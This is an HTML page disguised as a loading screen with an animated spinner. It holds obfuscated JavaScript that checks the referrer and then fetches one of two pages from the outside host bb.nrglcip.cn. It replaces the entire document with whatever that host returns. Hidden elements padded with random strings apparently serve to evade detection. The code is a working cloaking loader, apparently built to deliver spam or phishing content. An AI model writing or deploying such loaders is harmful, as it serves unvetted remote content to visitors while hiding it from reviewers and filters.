<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .dVMRMr058 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .dVMRMr058 .WoYLU3YfrKc {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .dVMRMr058 .content {
            line-height: 50px;
            text-align: center
        }

        .dVMRMr058 .img {
            width: 100%
        }

        .dVMRMr058 .SWsnqq {
            text-align: center
        }

        .dVMRMr058 .SWsnqq span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .dVMRMr058 .SWsnqq span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .dVMRMr058 .SWsnqq span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .dVMRMr058 .SWsnqq span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .dVMRMr058 .SWsnqq span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .dVMRMr058 .SWsnqq span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .dVMRMr058 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function HuHOXo9J5mqd(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var ruEhT = HuHOXo9J5mqd('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ ruEhT +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ ruEhT +".html?a=share";
		}
		
        YVqj3yc=url+"#"+new Date().getTime();
        YVqj3yc && function() {
            $.get(YVqj3yc, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >SdwQZ77on3RJJnRWCijvFo5XdS4Ja6GHjnE6HmPcDakpgCknsj8Q5odbhCiFvrlG6k8aKinbv68iNXiW2</h1>
<ul style='display:none' >NiXUenQYXFV9yyFjjhFY4x9ylEH43O3YgfF50hiyQawJU8kPcNg3m3AZgn95mETPzEjE3TwMqbt</ul>
<a  href='#' style='display:none'>uQX8cGJWtAJq49QQZJ1FMGgKhLadUOg3ttLWggQDjUuO3u4XhYKVn33YUbfnWBb4pNS1</a>
<img  src='' style='display:none'>
<p  style='display:none'>ucrjJMv9OiWhBhNvwQopPLhWXAUjEo5XDZiFKF1noUpJkJjpUN8rgZfYCQsiAkQ1RE3mdMsbKPUWtL1ZxmEPqDXCUJ388nvO8j</p>
<div style='display:none'>WuGIheePE73q5ZYeiplUOU7KSCECZwa7sW9Af5mq15ieRsqM3</div>
<span style='display:none'>QMGJXGO9r0LKXwQUY7XWv5tcQznv9JQQWaMzDr9QfdRSktbyV2694J1C9I3ow4</span>
<a  href='#' style='display:none'>uQX8cGJWtAJq49QQZJ1FMGgKhLadUOg3ttLWggQDjUuO3u4XhYKVn33YUbfnWBb4pNS1</a>
<b style='display:none' >c1IjNSZhksZDz1hfGCq1CiQHwj8ffCOxoztwhyCHFxkV0LbMPrvBAyzeBtaCzc3wLJP0a5EV</b>
<img  src='' style='display:none'><div class="dVMRMr058">
    <div class="WoYLU3YfrKc">
        <div class="SWsnqq">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>FDxdjF1q4D9wqhHUj1Tie12gj4NSQy1pOjf0XUJOSZivMlO3Z0UmLvGofWsNbQY1SSCFFdAQ43DoghSFCKo6uXWb9</div>
<div style='display:none'>FDxdjF1q4D9wqhHUj1Tie12gj4NSQy1pOjf0XUJOSZivMlO3Z0UmLvGofWsNbQY1SSCFFdAQ43DoghSFCKo6uXWb9</div>
<img  src='' style='display:none'>
<b style='display:none' >mP985eALFgowMLQvTiCEagApXnOaPesZMK6t7qZFHxNA8jFB8V54CpEe4BNQaHm5akjAabcgp7GkBNWI5HQM2A1p4SJe4G8iYof0</b>
<ul style='display:none' >gT9rlgxMdWGpbWUsUlLtLxYymj9SiaeLltDbyqWRbhX1HYhCYUzH2wS0V2pZ</ul></body>
</html>